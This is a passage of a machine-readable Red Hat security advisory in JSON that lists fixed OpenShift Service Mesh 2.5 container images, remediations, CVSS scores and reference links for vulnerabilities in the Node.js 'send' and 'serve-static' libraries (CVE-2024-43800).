"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
